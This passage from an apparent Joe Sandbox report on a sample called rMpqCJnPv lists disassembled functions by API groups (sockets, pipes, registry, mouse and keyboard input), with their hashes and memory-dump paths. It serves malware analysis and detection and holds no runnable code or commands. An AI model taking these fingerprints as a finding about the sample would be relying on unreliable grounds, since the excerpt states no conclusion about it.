                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4170576061-0
                                                                                                                    • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                                                    • Instruction ID: 299df0d3b2c780583a99b8630fc54a56be777f1b0f6ef0a8e7811bd990f9169f
                                                                                                                    • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                                                    • Instruction Fuzzy Hash: 0941A532A0868282EB20AF2EE4442ADB350FB56BA4F804231DF5E037A9CF3CE555C751
                                                                                                                    Function 00007FF7BB8815C4 Relevance: 10.6, APIs: 7, Instructions: 90registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 395352322-0
                                                                                                                    • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                                                    • Instruction ID: e3eb50d0232ed8d7014c849fa12698548c1f082076f8388f1669028346e5463f
                                                                                                                    • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                                                    • Instruction Fuzzy Hash: 0C419432618B8586E721EF19E4583EAA3A0FB9A744F840135EF8D06A6CCF3DD159C790
                                                                                                                    Function 00007FF7BB854FCC Relevance: 10.6, APIs: 7, Instructions: 76memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: 3ff9d5b97ff0f3397fd123b3961e57fec5cb942d66177d40dd83b2538c190dac
                                                                                                                    • Instruction ID: f1681629ec626d43754da06fa3ad1dde1f9c4324a002c0134eb86317a09e0415
                                                                                                                    • Opcode Fuzzy Hash: 3ff9d5b97ff0f3397fd123b3961e57fec5cb942d66177d40dd83b2538c190dac
                                                                                                                    • Instruction Fuzzy Hash: C8316221A08B4685DB14AF1EE4942ADB3A0FB56FD0F888235DF5D137A8CE3CE4558794
                                                                                                                    Function 00007FF7BB854EB0 Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocByteCharMultiStringWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3603722519-0
                                                                                                                    • Opcode ID: 7233c68a2400e071be4378e5aae13f7568ef777c7dca8fc4ad1472b70e2e1c5c
                                                                                                                    • Instruction ID: 974c2c14d47e60357df6a889ca81e4ec8d0feee5db331c62920a394184e457ac
                                                                                                                    • Opcode Fuzzy Hash: 7233c68a2400e071be4378e5aae13f7568ef777c7dca8fc4ad1472b70e2e1c5c
                                                                                                                    • Instruction Fuzzy Hash: 9C317421A08B4589DB10AF2EE844169F3A0FB55F90F885236DF9D037ADCF3CE5A48750
                                                                                                                    Function 00007FF7BB88AEDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                    • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                                                                    • Instruction ID: c934d6742efe01a8aaccbbcc23d2e72031b9932fb765504d3a2d0f90bedf470f
                                                                                                                    • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                                                                    • Instruction Fuzzy Hash: F6317A3260868187E7709F29F498B5AB761FB99790F509239EF8803BA8CF3CD445CB50
                                                                                                                    Function 00007FF7BB85FAFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                    • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                                                    • Instruction ID: ad0629f7a14fc967ccd51c68af1ea2144d10e218f862347b20b449869975f3e4
                                                                                                                    • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                                                    • Instruction Fuzzy Hash: D7316162A18B4681EB10AB2CD454369A2A4FFA6778F900334DFBD067E8CF3DD4558791
                                                                                                                    Function 00007FF7BB85F9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                    • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                                                    • Instruction ID: 555ee0185cafe2b400aa2a2ff9a39d816aa55973daca0df068e1e07911a0ba82
                                                                                                                    • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                                                    • Instruction Fuzzy Hash: C3217121A18B4682EB11AB2CD054379A3A0FBA6778F904335DF6E067EDDF7CD0148791
                                                                                                                    Function 00007FF7BB7E8F40 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3220332590-0
                                                                                                                    • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                                                                    • Instruction ID: d8c0a10a8bbb647fa5a856a0d1a21ee338a00328f633b1c694e8395f584b56ef
                                                                                                                    • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                                                                    • Instruction Fuzzy Hash: 3BA10567A1424385E724AF7DC4047BDB3A1FF19B58F941036EF1987AB8EA3DA801D324
                                                                                                                    Function 00007FF7BB80A054 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: f$p
                                                                                                                    • API String ID: 3215553584-1290815066
                                                                                                                    • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                                                    • Instruction ID: 127148727c9ed4d25abc0d713623fc8ab087b6eb805bf13fe429cd46f428ef83
                                                                                                                    • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                                                    • Instruction Fuzzy Hash: DB12A522E1D15385FB20BA1CE044679E6E1FB62794FD44231DBA9076ECDB3DE560CBA0
                                                                                                                    Function 00007FF7BB84AD30 Relevance: 9.2, APIs: 6, Instructions: 193memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3859894641-0
                                                                                                                    • Opcode ID: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                                                                    • Instruction ID: cb61174579f2813006442208cece6594ecd19447eb7ae0b24f23dd2c9dbf4bf4
                                                                                                                    • Opcode Fuzzy Hash: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                                                                    • Instruction Fuzzy Hash: 0B713D7190864289EA24BB6E955417DE264FF66B80B944036DF5E0F7B9DF3CE821C3A0
                                                                                                                    Function 00007FF7BB85D1F0 Relevance: 9.1, APIs: 6, Instructions: 131filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 564229958-0
                                                                                                                    • Opcode ID: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                                                    • Instruction ID: 5ece88df00aef7f9872a6989476c2454d93351dc821472ffdb26a9cb1ed7864b
                                                                                                                    • Opcode Fuzzy Hash: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                                                    • Instruction Fuzzy Hash: 15514422A1468295EB20FF6CD4406E9A365FFA5784FC00032EF4C579ADDFA8E755C790
                                                                                                                    Function 00007FF7BB7ED4CC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 0-2263619337
                                                                                                                    • Opcode ID: abd7f12bf36cb50ff75a1acc999edca8295c1a5b87ac996e7dbe5b35bb5e94a0
                                                                                                                    • Instruction ID: 27cec893c0def1e6fe915b46ced7591f7c3c8b6f0a890061dfdcb56763c4fd89
                                                                                                                    • Opcode Fuzzy Hash: abd7f12bf36cb50ff75a1acc999edca8295c1a5b87ac996e7dbe5b35bb5e94a0
                                                                                                                    • Instruction Fuzzy Hash: 4051A632B0960285EA10EB6DE1401BCA3A5FF66B88F944536DF0E477BDDE39D415C3A0
                                                                                                                    Function 00007FF7BB7E1E04 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2592858361-0
                                                                                                                    • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                                                    • Instruction ID: f2f8a9c2d47f3917310b75c8ed5fb013fc316d20baf34c370e40740f013203c9
                                                                                                                    • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                                                    • Instruction Fuzzy Hash: 2151AF31A1864286EA20AB2DD4487B9A764FF6AB94F904236CF5D47BB8CF7CE411C750
                                                                                                                    Function 00007FF7BB874C58 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 383626216-0
                                                                                                                    • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                                                                    • Instruction ID: eb71721531ab0f3ef52e3006cb5680cbb8e25a736ee8bb0fade6b8c077ab6449
                                                                                                                    • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                                                                    • Instruction Fuzzy Hash: 7231DF33B042428BE710DF69D484AEC73A1FB99708F801235EF4A53AA8DF38E555C780
                                                                                                                    Function 00007FF7BB811E74 Relevance: 9.1, APIs: 6, Instructions: 56threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2082702847-0
                                                                                                                    • Opcode ID: 61ceddc5787947a58d9fe000786d9d3995f6ca174d30162394f7b26a0e686deb
                                                                                                                    • Instruction ID: 91c4bf2289c392713f47ec897568637eff64fe07519eb3c94232077ed4a847bd
                                                                                                                    • Opcode Fuzzy Hash: 61ceddc5787947a58d9fe000786d9d3995f6ca174d30162394f7b26a0e686deb
                                                                                                                    • Instruction Fuzzy Hash: 63215621A0B74281EE55FB6CA4041B9E291BFAA774F940734DF6D067F8DF3CE42482A0
                                                                                                                    Function 00007FF7BB8909FC Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 43455801-0
                                                                                                                    • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                                                                    • Instruction ID: 0ee725038f2439255ddc65926fb81c2139541efa272992bce4a4e40d23cff032
                                                                                                                    • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                                                                    • Instruction Fuzzy Hash: A5119031B1434286EB14AB2DF828769AB50FB96B84F846135CF4603B78CF7DA464C790
                                                                                                                    Function 00007FF7BB802D5C Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
